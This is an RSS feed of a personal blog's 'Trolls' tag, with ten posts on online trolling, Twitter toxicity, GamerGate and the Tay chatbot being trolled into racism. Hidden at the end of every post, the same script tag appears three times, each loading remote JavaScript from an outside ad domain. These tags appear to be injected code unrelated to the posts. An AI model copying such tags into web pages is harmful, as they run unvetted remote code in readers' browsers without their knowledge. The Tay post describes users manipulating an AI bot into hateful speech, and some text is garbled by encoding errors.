<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Where Worlds Collide &#187; Trolls</title>
	<atom:link href="http://www.kalyr.co.uk/weblog/tag/trolls/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kalyr.co.uk/weblog</link>
	<description>The blogs of Tim Hall</description>
	<lastBuildDate>Fri, 10 Mar 2017 15:33:59 +0000</lastBuildDate>
	<language>en-US</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.7.41</generator>
	<item>
		<title>Don&#8217;t Feed The Trolls</title>
		<link>http://www.kalyr.co.uk/weblog/rants/dont-feed-the-trolls/</link>
		<comments>http://www.kalyr.co.uk/weblog/rants/dont-feed-the-trolls/#comments</comments>
		<pubDate>Wed, 12 Oct 2016 17:44:33 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Religion and Politics]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=16877</guid>
		<description><![CDATA[This is a textbook case of a troll derailing an entire conversation and making it all about themselves. <a href="http://www.kalyr.co.uk/weblog/rants/dont-feed-the-trolls/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>This is a textbook case of a troll <a href="http://wildhunt.org/2016/10/remembering-seb-barnett-artist-creator-shaman.html" target="_blank">derailing an entire conversation</a> and making it all about themselves. What sort of person concern-trolls a memorial post and argues with mourners? Before the internet, a person like that would have to crash a funeral to reach that level of abusive behaviour.</p>
<p>Now. I know next to nothing about that subculture and even less about that specific community. But I doubt very much that this individual is motivated by genuine concern over &#8220;cultural appropriation&#8221;, especially when there is little or no evidence to support their accusation. Far more likely to be a case of clinical-level personality disorder, and has appropriated the rhetoric of &#8220;Tumblr social justice&#8221; because that&#8217;s a known weak spot in some communities&#8217; immune systems. In other words, it&#8217;s pure trolling in the original sense of the word.</p>
<p>There are plenty of reasons to criticise the memes of Tumblr-style social justice, and one of those is the way it creates such a rich environment for trolls. It can be hard to tell the different between trolls and zealots with no clue about boundaries, and that allows trolls to thrive.</p>
<p>Trolls are parasites. They suck up attention and energy that could have been used in sharing information or building community, while contributing nothing in return. Their &#8220;free speech&#8221; comes with too high a price tag for anyone else.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/rants/dont-feed-the-trolls/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Trolling of Tay</title>
		<link>http://www.kalyr.co.uk/weblog/computing/testing/the-trolling-of-tay/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/testing/the-trolling-of-tay/#comments</comments>
		<pubDate>Thu, 24 Mar 2016 21:25:47 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Testing & Software]]></category>
		<category><![CDATA[Artificial Intelligence]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=15408</guid>
		<description><![CDATA[What can the testing community learn from the way trolls turned an AI bot into a massive racist? <a href="http://www.kalyr.co.uk/weblog/computing/testing/the-trolling-of-tay/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-15409" alt="Tay" src="http://www.kalyr.co.uk/weblog/wp-content/uploads/2016/03/Tay-150x150.jpg" width="150" height="150" />The story in brief: Microsoft <a href="https://twitter.com/tayandyou" target="_blank">created a self-learning chatbot</a> designed to emulate the speech of Millenials. They let her loose on Twitter, where she immediately got trolled hard by members of one of the most notorious boards of 4chan, and she turned into a massive Hitler-quoting racist. Microsoft took the bot down, and are working hard to remove the worst of her tweets. Oops.</p>
<p>Aside from obvious conclusion that there are some awful people on 4chan, what can the testing community learn from this?</p>
<p>One seems to be that if you carry out testing in a very public space, any testing failures will be very public as well. An artificial intelligence turning into a noxious racist is a pretty spectacular fail in anyone&#8217;s books. Given the well-known nature of the bottom half of Twitter, it&#8217;s also an all-too-predictable failure; people in my own Twitter feed express very little surprise over what happened. It&#8217;s not as if anyone is unaware of the trolls of 4chan and the sorts of things they do.</p>
<p>What they should have done is another question. Tay was a self-learning algorithm that merely repeated the things she&#8217;d been told, without any understanding of their social contexts or emotional meanings. She&#8217;s like a parrot that overhears too much swearing. It meant that if she fell in with bad company at the start, she&#8217;d inevitably go bad.</p>
<p>The most important lesson, perhaps, is that both software designers and testers need to consider evil. Not to be evil, of course, but to think of what evil might do, and how it might be stopped.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/testing/the-trolling-of-tay/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>The Trolling of Joshua Goldberg</title>
		<link>http://www.kalyr.co.uk/weblog/uncategorized/the-trolling-of-joshua-goldberg/</link>
		<comments>http://www.kalyr.co.uk/weblog/uncategorized/the-trolling-of-joshua-goldberg/#comments</comments>
		<pubDate>Sun, 13 Sep 2015 14:53:50 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Religion and Politics]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Trolls]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=13506</guid>
		<description><![CDATA[A reminder of just how much of the toxicity of internet discussions is the work of a tiny number of people. <a href="http://www.kalyr.co.uk/weblog/uncategorized/the-trolling-of-joshua-goldberg/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>The saga of <a href="http://www.thedailybeast.com/articles/2015/09/11/terrorist-troll-pretended-to-be-isis-white-supremacist-and-jewish-lawyer.html" target="_blank">Joshua Goldberg</a> is hard to take in. Here is a prolific troll who managed multiple personae and passed himself off in different spaces as a radical feminist, a white nationalist, a Jihadi supporter of ISIS, a Gamergater, a Zionist and an anti-Semite. He even spent ages arguing with himself on Twitter. I&#8217;m wondering if he has two sock puppets fighting both sides of the EM vs P4 wars.</p>
<p>It&#8217;s a reminder of just how much of the toxicity of internet discussions is the work of a tiny number of people. It&#8217;s also a reminder that many of the worst trolls aren&#8217;t true believers in a cause, but just delight in causing mayhem and damage for their own entertainment.</p>
<p>Most of those groups accepted Goldberg as one of their own, since he reliably repeated their memes and talking points. Which makes the &#8220;Hurr, hurr, my outgroup fell for him&#8221; I&#8217;m hearing sound a bit hollow. Your own sect probably fell for him too. As I&#8217;ve said before, if your rhetoric so predictable that an outsider can fake it without being immediately recognisable, you have a problem.</p>
<p>Has a successful troll ever passed themselves off as a pragmatic, principled moderate? It&#8217;s difficult to imagine, because they would involve laying themselves bare and expressing doubts, something that&#8217;s orders of magnitude harder to fake than fanaticism.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/uncategorized/the-trolling-of-joshua-goldberg/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Trolls Are The New Spam</title>
		<link>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-are-the-new-spam/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-are-the-new-spam/#comments</comments>
		<pubDate>Sun, 12 Oct 2014 16:56:08 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Social Media]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=11667</guid>
		<description><![CDATA["Just ignore the trolls" is as useless as "Just delete the spam". We can do better. <a href="http://www.kalyr.co.uk/weblog/computing/social-media/trolls-are-the-new-spam/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><a href="https://twitter.com/evilrooster" target="_blank">Abi Sutherland</a> made a very good point on Twitter a couple of days ago comparing the troll problem with the spam problem.</p>
<p>A few years back, spam threatened to overwhelm the internet. Our email inboxes were getting flooded with fake Viagra and make-money-fast schemes that drowned out legitimate communications. Likewise bot-generated comment spam meant that any blogger that wanted to enable comments either needed to spend vast amounts of time hand-moderating comments or see their comment sections flooded with garbage.</p>
<p>The spammers and their apologists used to say &#8220;Just delete it&#8221;, and then whined about freedom of speech every time anyone proposed anti-spam solutions.</p>
<p>We didn&#8217;t let the spammers win. Instead we built reputation systems like Akismet, and we added Bayesian filtering to our email, and it turned the tide. They weren&#8217;t 100% effective, and did generate the occasional false positive, but they have reduced spam to a manageable problem.</p>
<p>Today we&#8217;ve got a huge problem with trolls. They reduce the signal-to-noise ratio across so many sites that &#8220;don&#8217;t read the comments&#8221; and &#8220;bottom half of the internet&#8221; are commonly used phrases. They harass people online to the extent that far too many people with something worthwhile to say end up being hounded off social media. </p>
<p>Trolls can kill productive conversation. &#8220;Just ignore them&#8221; is equivalent to &#8220;Just delete it&#8221;. </p>
<p>Dealing with trolls is a hard problem. Trolling is vastly more subjective and context-dependent that spam. Building an equivalent reputation system based upon who&#8217;s favourited or blocked blog comments and social media posts won&#8217;t be an easy task. Building one that reduces the impact of bad behaviour without creating dangerous echo-chambers may prove even harder. But it can&#8217;t be an impossible task either.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-are-the-new-spam/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The Trouble With Twitter</title>
		<link>http://www.kalyr.co.uk/weblog/computing/social-media/the-trouble-with-twitter/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/social-media/the-trouble-with-twitter/#comments</comments>
		<pubDate>Wed, 08 Oct 2014 20:01:19 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Social Media]]></category>
		<category><![CDATA[GamerGate]]></category>
		<category><![CDATA[Trolls]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=11631</guid>
		<description><![CDATA[Does the #GamerGate hashtag demonstrate Twitter's big failing? <a href="http://www.kalyr.co.uk/weblog/computing/social-media/the-trouble-with-twitter/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-5445" alt="Fail Whale" src="http://www.kalyr.co.uk/weblog/wp-content/uploads/2012/11/FailWhale-150x150.jpg" width="150" height="150" />I am getting sick of #GamerGate on Twitter, especially when I have online acquaintances on both &#8220;sides&#8221;.Â  There way too much toxicity swilling aroud the whole thing, to which people on both sides are contributing. It&#8217;s yet another example of the failure mode of &#8220;Hashtag activism&#8221;, and I know I&#8217;m not the only person who wonders if all this negativity is sucking out all the positive aspects of Twitter.</p>
<p>I&#8217;m not the only one who thinks this:</p>
<p><a href="http://www.zenofdesign.com/the-problem-with-gamergate-is-twitter/" target="_blank">Dave Rickey writing in Zen of Design</a></p>
<blockquote><p>Twitter is a breeding ground for social dysfunction, where you are lulled into a sense of community and comradery because everyone you follow and everyone that follows you are basically in agreement. The only things that can penetrate the bubble are â€œOutrage Pornâ€ being retweeted into it, and attacks responding to outrage porn that is being passed around other bubbles.</p>
<p>Thereâ€™s no room for nuance or in-depth discussion, and anyone who makes the mistake of trying will see their lengthy and thoughtful think-piece distilled down to a barely-true (if that) 140 character sound bite that will be used as a new piece of outrage porn.</p></blockquote>
<p><a href="http://www.slate.com/articles/technology/technology/2014/10/twitter_is_broken_gamergate_proves_it.html" target="_blank">David Auerbach writing in Slate:</a></p>
<blockquote><p>People are accustomed to being irreverent in conversations with friends, but on Twitter, anyone who might take offense is likely to overhear (unless your tweets are protected, but why be on Twitter in that case?). At least you can go on Reddit without having the repugnant Philosophy of Rape subreddit being shoved in your face; Twitter drags everyone down to the bottom. No matter whom you unfollow, mute, or block, someone you do follow will sooner or later draw your attention to an outrage and encourage you to join the condemnation. On Twitter, negativity is viral.</p></blockquote>
<p>Twitter didn&#8217;t used to be like this. I can remember the times when it was the virtual equivalent of the friendly local pub where all your mates hung out and you swapped joles and stories. I remember reading <a href="http://scobleizer.com/?p=5980" target="_blank">Robert Scoble&#8217;s blog post from five years ago</a> claiming Twitter didn&#8217;t suffer from the &#8220;forum/chatroom problem&#8221; because your feed showed only people you&#8217;d invited to join the conversation.</p>
<p>We&#8217;ve lost that somewhere along the line.</p>
<p>Maybe it was when Twitter gave greater prominence to the notifications tab. Maybe it all went pear-shaped when they introduced the retweet, something Robert Scoble raised as a concern. Or maybe it was just that, like so many other places, Twitter was better in the early days before the rabble arrived, when most people were enthusiastic early adopters.</p>
<p>Twitter at it&#8217;s best can still be great fun; I love the rapid-fire exchanges between one particular group of friends who managed<a href="https://storify.com/Kalyr/why-i-love-twitter?utm_source=embed&amp;utm_medium=publisher&amp;utm_campaign=embed-headerhttp://" target="_blank"> a mashup of The Shipping Forecast and Bruce Forsythe&#8217;s Generation Game</a> (&#8220;<em>&#8230;set of matching luggage 4, becoming 5 later&#8230;</em>&#8220;)</p>
<p>But I can&#8217;t help feeling that either we all need to be smarter in our use of Twitter, with a little less &#8220;outrage porn&#8221;, ot Twitter needs to rethink some aspects of how the service works, so it amplifies the loudest voices a little less.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/social-media/the-trouble-with-twitter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trust Fund Trolls</title>
		<link>http://www.kalyr.co.uk/weblog/uncategorized/trust-fund-trolls/</link>
		<comments>http://www.kalyr.co.uk/weblog/uncategorized/trust-fund-trolls/#comments</comments>
		<pubDate>Thu, 02 Oct 2014 14:49:50 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Alex Lifschitz]]></category>
		<category><![CDATA[Trolls]]></category>
		<category><![CDATA[Vox Day]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=11551</guid>
		<description><![CDATA[It probably ought not to be a surprise that some of the most annoying people on the interweb  turn out to be trust fund brats. <a href="http://www.kalyr.co.uk/weblog/uncategorized/trust-fund-trolls/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>It probably ought not to be a surprise that some of the most annoying people on the interweb, from all-round bigot <a href="http://rationalwiki.org/wiki/Theodore_Beale" target="_blank">Vox Day</a> to book-burning culture warrior <a href="https://www.youtube.com/watch?v=51McaZrra7w" target="_blank">Alex Lifschitz </a>turn out to be trust fund brats. These are people who have either never needed to hold down a proper job in order to lead a comfortable lifestyle, or owe whatever positions they do hold to money and family connections rather than needing to demonstrate any actual ability. They don&#8217;t inhabit the same moral or financial universe as the rest of us, and never need to deal with the negative consequences of acting like assholes.</p>
<p>This is what &#8220;privilege&#8221; means.</p>
<p>The terrible thing is that this isn&#8217;t restricted to internet blowhards. Our government is made up of people like this. As the gap between the rich and everyone else grows ever larger in English-speaking world, we can only expect this to get worse.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/uncategorized/trust-fund-trolls/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Woman jailed for trolling herself</title>
		<link>http://www.kalyr.co.uk/weblog/computing/social-media/woman-jailed-for-trolling-herself/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/social-media/woman-jailed-for-trolling-herself/#comments</comments>
		<pubDate>Thu, 06 Feb 2014 19:45:44 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[asides]]></category>
		<category><![CDATA[Social Media]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=9863</guid>
		<description><![CDATA[Woman becomes first person to be jailed for &#8216;trolling herself is today&#8217;s bizarre headline. The actual story isn&#8217;t quite as bizarre as the headline, but is more evidence that many persistent trolls aren&#8217;t rational people with unpleasant agendas, but troubled &#8230; <a href="http://www.kalyr.co.uk/weblog/computing/social-media/woman-jailed-for-trolling-herself/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><a href="http://metro.co.uk/2014/02/05/woman-becomes-first-person-to-be-jailed-for-trolling-herself-4292090/?ITO=facebook">Woman becomes first person to be jailed for &#8216;trolling herself</a> is today&#8217;s bizarre headline. The actual story isn&#8217;t quite as bizarre as the headline, but is more evidence that many persistent trolls aren&#8217;t rational people with unpleasant agendas, but troubled individuals with mental health problems or substance abuse issues.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/social-media/woman-jailed-for-trolling-herself/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Two Links Worth Reading</title>
		<link>http://www.kalyr.co.uk/weblog/uncategorized/two-links-worth-reading/</link>
		<comments>http://www.kalyr.co.uk/weblog/uncategorized/two-links-worth-reading/#comments</comments>
		<pubDate>Tue, 07 Jan 2014 11:19:33 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Feminsm]]></category>
		<category><![CDATA[Social Justice]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=9525</guid>
		<description><![CDATA[A couple of links on social justice and internet outrage that are well worth reading, <a href="http://www.kalyr.co.uk/weblog/uncategorized/two-links-worth-reading/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>A couple of links that are well worth reading</p>
<p>First, <a href="http://www.vice.com/en_uk/read/how-to-improve-feminism-in-2014?utm_source=vicetwitter" target="_blank">How to Improve Feminism in 2014 </a>in Vice (Warning! Do <strong>not </strong>read the comments unless you want to gawp at sexist idiots). Second, and far more important, this very well-written piece <a href="http://quinnae.com/2014/01/03/words-words-words-on-toxicity-and-abuse-in-online-activism/" target="_blank">On Toxicity and Abuse in Online Activism</a>, talking about online anger, and why the whole social-justice call-out culture has turned toxic.</p>
<p>It&#8217;s long, but it&#8217;s worth reading the whole thing. A central point is when the zealots coming from within the social justice movement start to look like the trolls from places like 4chan, something has gone horribly wrong.</p>
<p>I&#8217;ve always believed that tribalism is a Very Bad Thing, and one aspect of tribalism is when you turn a blind eye to behaviour from within your own &#8220;tribe&#8221; that&#8217;s just as bad as anything from the &#8220;enemy camp&#8221;. Sadly, good causes sometimes attract horrible people, you only have to look at all the atrocities perpetrated in the name of religion to recognise that.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/uncategorized/two-links-worth-reading/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Trolls vs. Gatekeepers</title>
		<link>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-vs-gatekeepers/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-vs-gatekeepers/#comments</comments>
		<pubDate>Fri, 16 Aug 2013 16:42:43 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Social Media]]></category>
		<category><![CDATA[Trolls]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=8360</guid>
		<description><![CDATA[Tim Dunlop writing in The Guardian suggests that the word 'troll' has been redefined by the powerful. <a href="http://www.kalyr.co.uk/weblog/computing/social-media/trolls-vs-gatekeepers/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Tim Dunlop writing in The Guardian suggests that <a href="http://www.theguardian.com/commentisfree/2013/aug/16/trolls-journalism-editors?CMP=twt_gu">the word &#8216;troll&#8217; has been redefined by the powerful</a>:</p>
<blockquote><p>What particularly disturbs me is the way in which sections of the mainstream media and others in positions of power use the worst of what happens online to condemn all that happens online. One manifestation of this is the way in which the word â€œtrollâ€ has been appropriated by sections of the mainstream and redefined.</p>
<p>The word once had quite a specialised meaning limited to a particular sort of disruptive behaviour, but it has now become a catch-all term to describe any behaviour that some journalists and editors deem inappropriate. Their responses to what they call â€œtrollingâ€ often seem less about combating abuse than reasserting their role as gatekeeper, to restore to themselves the right to decide who gets to speak in public and who doesnâ€™t. It is what US academic Susan Herbst calls â€œthe strategic use of civilityâ€.</p></blockquote>
<p>I think he makes some good points here. On the one hand, when game designers get death threats for making minor changes to weapon statistics in a game, something is very, very wrong. But that&#8217;sÂ  a completely different thing from someone like Suzanne Moore not being able to express rather bigoted comments in a newspaper column without being called out on it.</p>
<p>You only have to mention names like &#8220;Jan Moir&#8221;, &#8220;Brendan O&#8217;Neill&#8221;, &#8220;James Delingpole&#8221; or &#8220;Julie Birchill&#8221; to recognise that some scribblers in the mainstream media are trolls in the original sense of the word, writing link-bait that deliberately pushes people&#8217;s buttons in order to get more pageviews for advertisers.</p>
<p>The power of the internet is that it gives the voice to those who don&#8217;t have big media soapboxes, and allows the expression of ideas and opinions that are marginalised by those who control the media. The fact that some of those ideas and opinions are bad ones doesn&#8217;t change this. We should not let what amounts to an old-fashioned moral panic let those in power take that away.</p>
<p>Commenter <a class="d2-username" title="View EpistocracyNowâ€™s profile" href="http://www.theguardian.com/discussion/user/id/10677930" target="_top">EpistocracyNow</a> makes another very good point about the way the word &#8220;troll&#8221; gets misused to mean &#8220;Anyone not on my side&#8221;.</p>
<blockquote><p>&#8230; there are also ideologically biased people who viciously pursue &#8220;trolls&#8221; who forcefully express competing views, but give a pass to genuine trolls or abusers on their own side. It&#8217;s a form of dissonance avoidance &#8211; if someone is a &#8220;troll&#8221;, you don&#8217;t have to acknowledge the uncomfortable, dissonance-inducing things he or she might be saying.</p></blockquote>
<p>I&#8217;ve seen a lot of that of late, especially in the Great Geek Culture Sexism Wars. I guess it&#8217;s inevitable when opposing camps get so entrenched that &#8220;Then and Us&#8221; trumps &#8220;Right and Wrong&#8221;.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/social-media/trolls-vs-gatekeepers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Does The Internet Turn People Into Dicks?</title>
		<link>http://www.kalyr.co.uk/weblog/computing/social-media/does-the-internet-turn-people-into-dicks/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/social-media/does-the-internet-turn-people-into-dicks/#comments</comments>
		<pubDate>Fri, 09 Aug 2013 12:50:16 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Social Media]]></category>
		<category><![CDATA[Trolls]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=8270</guid>
		<description><![CDATA[Martin Robbins asks what is it about the internet that turns people into massive dicks and wonders if Twitter's big problem is that it doesn't scale well. <a href="http://www.kalyr.co.uk/weblog/computing/social-media/does-the-internet-turn-people-into-dicks/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Martin Robbins asks <a href="http://www.vice.com/en_uk/read/why-is-everyone-so-angry-on-the-internet">what is it about the internet that turns people into massive dicks?</a>, and highlights <a href="http://www.kalyr.co.uk/weblog/computing/social-media/twitter-trolls-preventing-the-pile-ons/">one of the issues with Twitter</a> I&#8217;ve mentioned in an earlier post.</p>
<blockquote><p>Think of playground bullying, for example â€“ thereâ€™s a massive difference between a child calling another child a dick and a hundred children standing around one child shouting, â€œYouâ€™re a dick!â€</p>
<p>To be blunt, Twitter doesnâ€™t scale. It wasnâ€™t designed for people to make tens of thousands of connections, and Iâ€™m not entirely convinced that the humans using it were either â€“ not without some strategy to cope with it all.</p></blockquote>
<p>There isn&#8217;t an easy solution, and I hope that Twitter will find away to prevent harassment of individuals without removing the ability of ordinary people to speak truth to power. We should not allow trolls to be used as a stalking horse for much broader restrictions on political dissent. This is especially pertinent once David Cameron and the UK tabloid press jump on the bandwagon. That&#8217;s the point where we need to be extra vigilant about the direction in which the bandwagon starts heading.</p>
<p>There are wider social issues as well.</p>
<blockquote><p>It also runs afoul of the completely ****ed up relationship our society has with celebrity. Iâ€™ve lost count of the number of times Iâ€™ve seen it argued that people with a decent follower account should be expected to &#8220;take it&#8221;, as a sort of penalty for being popular.</p></blockquote>
<p>Which also make me wonder how much reality TV such as The Apprentice or X-Factor, or the cruelty-based nature of some so-called &#8220;comedy&#8221; (I&#8217;m thinking of that Russell Brand prank phone call incident a while ago) feeds the idea that it&#8217;s acceptable to be abusive to complete strangers.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/social-media/does-the-internet-turn-people-into-dicks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
